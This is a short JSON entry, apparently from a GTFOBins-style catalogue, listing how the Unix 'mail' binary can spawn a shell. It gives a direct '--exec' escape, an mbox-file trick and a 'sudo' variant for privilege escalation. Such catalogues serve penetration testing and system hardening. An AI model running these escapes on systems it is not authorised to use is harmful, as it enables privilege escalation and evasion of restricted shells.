You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

20 lines
486 B
JSON

{
"functions": {
"shell": [
{
"description": "GNU version only.",
"code": "mail --exec='!/bin/sh'"
},
{
"description": "This creates a valid Mbox file which may be required by the binary.",
"code": "TF=$(mktemp)\necho \"From nobody@localhost $(date)\" > $TF\nmail -f $TF\n!/bin/sh\n"
}
],
"sudo": [
{
"description": "GNU version only.",
"code": "sudo mail --exec='!/bin/sh'"
}
]
}
}